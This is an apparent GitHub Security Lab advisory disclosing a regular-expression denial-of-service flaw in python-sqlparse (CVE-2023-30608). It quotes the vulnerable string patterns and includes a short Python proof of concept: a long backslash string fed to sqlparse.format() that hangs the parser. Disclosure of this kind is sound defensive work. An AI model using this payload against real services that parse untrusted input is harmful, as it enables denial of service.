Coordinated Disclosure Timeline
- 2023-01-27: Report Sent
- 2023-04-18: Vulnerability patched along with advisory release
Summary
SQLparse has a ReDoS (regular expression denial of service) in the parser for SQL expressions.
Product
python-sqlparse
Tested Version
Details
Issue: ReDoS in keywords.py (GHSL-2023-001)
Both the String.Single and the String.Symbol regular expressions are vulnerable:
SQL_REGEX = [
...
(r"'(''|\\\\|\\'|[^'])*'", tokens.String.Single),
...
(r'"(""|\\\\|\\"|[^"])*"', tokens.String.Symbol),
...
]
This issue was found using the following CodeQL query
Impact
This vulnerability may lead to Denial of Service (DOS).
Proof of Concept
The following code will use the sqlparse.format() function to parse an attacker-controlled string, leading to a denial of service condition:
import sqlparse
attack = "'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"
res = sqlparse.format(attack)
print(res)
CVE
- CVE-2023-30608
Credit
This issue was discovered by @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-001 in any communication regarding this issue.